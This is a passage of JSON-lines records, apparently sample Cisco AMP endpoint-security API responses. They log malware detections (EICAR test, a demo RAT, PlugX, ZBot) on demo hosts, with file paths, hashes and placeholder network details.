Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055260891349000","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055248006447000,"timestamp":1610705025,"timestamp_nanoseconds":103000000,"date":"2021-01-15T10:03:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055248006447111","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1j4","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s1j4","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055239416513000,"timestamp":1610705023,"timestamp_nanoseconds":119000000,"date":"2021-01-15T10:03:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055239416512518","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055239416513000,"timestamp":1610705023,"timestamp_nanoseconds":72000000,"date":"2021-01-15T10:03:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055239416512517","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055222236643000,"timestamp":1610705019,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:03:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055222236643332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1uc","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s1uc","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055217941676000,"timestamp":1610705018,"timestamp_nanoseconds":243000000,"date":"2021-01-15T10:03:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055217941676035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255468063687000,"timestamp":1610705016,"timestamp_nanoseconds":920000000,"date":"2021-01-15T10:03:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255468063686673","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255420819046000,"timestamp":1610705005,"timestamp_nanoseconds":829000000,"date":"2021-01-15T10:03:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255420819046416","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395959000600,"timestamp":1610704997,"timestamp_nanoseconds":959000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"Win32.DemoMal.Rat.Client","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704997,"start_date":"2021-01-15T10:03:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900"},"parent":{"disposition":"Malicious","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055127747363000,"timestamp":1610704997,"timestamp_nanoseconds":930000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055127747362818","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055127747363000,"timestamp":1610704997,"timestamp_nanoseconds":930000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055127747362817","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906501425758000,"timestamp":1610704994,"timestamp_nanoseconds":771000000,"date":"2021-01-15T10:03:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906501425758211","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\VirusMap\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":3168,"disposition":"Clean","file_name":"mcvsmap.exe","identity":{"sha256":"ae16e10e621d6610a3f7f2c7122f9d1263700ba02d1b90e42798decb2fe84096","sha1":"9224de3af2a246011c6294f64f27206d165317ba","md5":"4e1e0b8b0673937415599bf2f24c44ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255369279439000,"timestamp":1610704993,"timestamp_nanoseconds":270000000,"date":"2021-01-15T10:03:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255369279438863","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906497130791000,"timestamp":1610704993,"timestamp_nanoseconds":662000000,"date":"2021-01-15T10:03:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906497130790914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Local Settings\\Temp\\RarSFX0\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":428,"disposition":"Malicious","file_name":"ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395608001000,"timestamp":1610704992,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:03:12+00:00","event_type":"Adobe Reader compromise","event_type_id":1107296261,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704992,"start_date":"2021-01-15T10:03:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a"},"parent":{"disposition":"Clean","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266559459951000,"timestamp":1610704979,"timestamp_nanoseconds":950000000,"date":"2021-01-15T10:02:59+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5832266559459950593","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":25939,"local_ip":"10.10.0.0","local_port":15322,"nfm":{"direction":"Outgoing connection from","protocol":"UDP"},"parent":{"process_id":1512,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":701000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408458","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":497000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408457","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":451000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408456","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266495035441000,"timestamp":1610704964,"timestamp_nanoseconds":482000000,"date":"2021-01-15T10:02:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266495035441159","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":607000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat 